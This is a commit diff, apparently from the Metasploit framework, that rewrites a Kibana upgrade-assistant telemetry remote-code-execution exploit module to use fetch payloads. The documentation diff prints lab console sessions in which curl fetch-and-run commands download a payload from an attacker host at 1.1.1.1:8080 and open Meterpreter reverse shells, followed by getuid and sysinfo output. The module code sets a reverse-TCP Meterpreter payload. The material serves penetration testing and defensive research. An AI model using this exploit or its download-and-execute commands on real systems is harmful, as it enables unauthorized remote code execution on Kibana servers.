kibana telemetry rce rewritten to use fetch payloads

rapid7 · Oct 6, 2023 · 931a67d · 931a67d
1 parent a2a9bec
commit 931a67d
Show file tree

Hide file tree

Showing 2 changed files with 45 additions and 21 deletions.
diff --git a/documentation/modules/exploit/linux/http/kibana_upgrade_assistant_telemetry_rce.md b/documentation/modules/exploit/linux/http/kibana_upgrade_assistant_telemetry_rce.md
@@ -25,6 +25,28 @@ To restart Kibana (easier during exploitation) issue the following command: `doc
 
 To wipe the boxes: `docker kill kib01; docker kill es01; docker container rm es01; docker container rm kib01`
 
+### Error Logs
+
+The following error logs will appear when the payload executes. The logs seem to repeat about every half second.
+
+```
+ error  [11:59:41.805] [warning][process] UnhandledPromiseRejectionWarning: TypeError: this._tasks[taskName] is not a function
+    at Timeout._interval.setInterval [as _onTimeout] (/usr/share/kibana/node_modules/oppsy/lib/index.js:42:49)
+    at ontimeout (timers.js:436:11)
+    at tryOnTimeout (timers.js:300:5)
+    at listOnTimeout (timers.js:263:5)
+    at Timer.processTimers (timers.js:223:10)
+    at emitWarning (internal/process/promises.js:97:15)
+    at emitPromiseRejectionWarnings (internal/process/promises.js:143:7)
+    at process._tickCallback (internal/process/next_tick.js:69:34)
+ error  [11:59:41.807] [warning][process] TypeError: this._tasks[taskName] is not a function
+    at Timeout._interval.setInterval [as _onTimeout] (/usr/share/kibana/node_modules/oppsy/lib/index.js:42:49)
+    at ontimeout (timers.js:436:11)
+    at tryOnTimeout (timers.js:300:5)
+    at listOnTimeout (timers.js:263:5)
+    at Timer.processTimers (timers.js:223:10)
+```
+
 ## Verification Steps
 
 1. Install the application
@@ -46,7 +68,7 @@ In this scenario, the cleanup process within Kibana kicked automatically, so no
 ```
 [*] Processing kibana_telem.rb for ERB directives.
 resource (kibana_telem.rb)> use exploit/linux/http/kibana_upgrade_assistant_telemetry_rce
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
 resource (kibana_telem.rb)> set rhosts 127.0.0.1
 rhosts => 127.0.0.1
 resource (kibana_telem.rb)> set rport 9200
@@ -55,29 +77,33 @@ resource (kibana_telem.rb)> set verbose true
 verbose => true
 resource (kibana_telem.rb)> set lhost 1.1.1.1
 lhost => 1.1.1.1
-msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > exploit
-
+msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > 
+msf6 exploit(linux/http/kibana_upgrade_assi
+stant_telemetry_rce) > rexploit
+[*] Reloading module...
+
+[*] Command to run on remote host: curl -so ./YFjALImGlTI http://1.1.1.1:8080/Hg3DGEu9GqlWD06kh4AzFg; chmod +x ./YFjALImGlTI; ./YFjALImGlTI &
+[*] Fetch Handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] Creating index
 [*] Index already exists
 [*] Sending index map
 [*] Sending telemetry data with payload
-[*] Using URL: http://1.1.1.1:8080/1vtNc3Hi
-[*] Generated command stager: ["curl -so /tmp/LAbvDplC http://1.1.1.1:8080/1vtNc3Hi;chmod +x /tmp/LAbvDplC;/tmp/LAbvDplC;rm -f /tmp/LAbvDplC"]
-[*] Command Stager progress - 100.00% done (114/114 bytes)
 [*] Waiting 1800 seconds for shell (kibana restart/cleanup)
-[*] Client 172.17.0.3 (curl/7.29.0) requested /1vtNc3Hi
+[*] Client 172.17.0.3 requested /Hg3DGEu9GqlWD06kh4AzFg
 [*] Sending payload to 172.17.0.3 (curl/7.29.0)
 [*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3045380 bytes) to 172.17.0.3
-[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.3:44668) at 2023-10-02 16:46:35 -0400
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.3:48674) at 2023-10-06 08:32:42 -0400
 [*] Removing telemetry data to prevent Kibana locking on restart
 
 meterpreter > getuid
 Server username: kibana
 meterpreter > sysinfo
 Computer     : 172.17.0.3
-OS           : CentOS 7.7.1908 (Linux 6.5.0-kali1-amd64)
+OS           : CentOS 7.7.1908 (Linux 6.5.0-kali2-amd64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
@@ -88,7 +114,7 @@ Meterpreter  : x64/linux
 ```
 [*] Processing kibana_telem.rb for ERB directives.
 resource (kibana_telem.rb)> use exploit/linux/http/kibana_upgrade_assistant_telemetry_rce
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
 resource (kibana_telem.rb)> set rhosts 127.0.0.1
 rhosts => 127.0.0.1
 resource (kibana_telem.rb)> set rport 9200
@@ -101,37 +127,36 @@ msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > set target 1
 target => 1
 msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > set rport 5601
 rport => 5601
-msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > check
-[*] 127.0.0.1:5601 - The target appears to be vulnerable. Exploitable Version Detected: 7.6.2
 msf6 exploit(linux/http/kibana_upgrade_assistant_telemetry_rce) > exploit
 
+[*] Command to run on remote host: curl -so ./hzeCuLxAxx http://1.1.1.1:8080/Hg3DGEu9GqlWD06kh4AzFg; chmod +x ./hzeCuLxAxx; ./hzeCuLxAxx &
+[*] Fetch Handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] Creating index
 [*] Index already exists
 [*] Sending index map
 [*] Sending telemetry data with payload
-[*] Using URL: http://1.1.1.1:8080/PbT2tbJKQyU
-[*] Generated command stager: ["curl -so /tmp/AcwIGAZC http://1.1.1.1:8080/PbT2tbJKQyU;chmod +x /tmp/AcwIGAZC;/tmp/AcwIGAZC;rm -f /tmp/AcwIGAZC"]
-[*] Command Stager progress - 100.00% done (117/117 bytes)
 [*] Waiting 1800 seconds for shell (kibana restart/cleanup)
 ```
 
 After several minutes, the host was rebooted instead of waiting for the cleanup process to happen. Docker host reboot was done
-with the following command: `docker kill kib01; docker start kib01`
+with the following command if daemonized: `docker kill kib01; docker start kib01`
 
 ```
-[*] Client 172.17.0.3 (curl/7.29.0) requested /PbT2tbJKQyU
+[*] Client 172.17.0.3 requested /Hg3DGEu9GqlWD06kh4AzFg
 [*] Sending payload to 172.17.0.3 (curl/7.29.0)
 [*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3045380 bytes) to 172.17.0.3
-[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.3:53100) at 2023-10-02 16:51:34 -0400
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.3:60508) at 2023-10-06 09:48:43 -0400
 [-] Cleanup must happen on the Elastic Database for Kibana to start. You need to DELETE /.kibana_1
 
 meterpreter > getuid
 Server username: kibana
 meterpreter > sysinfo
 Computer     : 172.17.0.3
-OS           : CentOS 7.7.1908 (Linux 6.5.0-kali1-amd64)
+OS           : CentOS 7.7.1908 (Linux 6.5.0-kali2-amd64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

diff --git a/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb b/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb
@@ -39,7 +39,6 @@ def initialize(info = {})
         'Platform' => [ 'linux' ],
         'Type' => :nix_cmd,
         'DefaultOptions' => {
-          # 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
           'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
           'WfsDelay' => 1800 # 30min
         },
@@ -49,7 +48,6 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2020-04-17',
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
           'Stability' => [CRASH_SERVICE_DOWN], # down until cleanup and reboot
           'Reliability' => [],
@@ -96,6 +94,7 @@ def elastic_cleanup
     request = {
       'uri' => normalize_uri(target_uri.path, '.kibana*'),
       'method' => 'DELETE'
+
     }
     request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?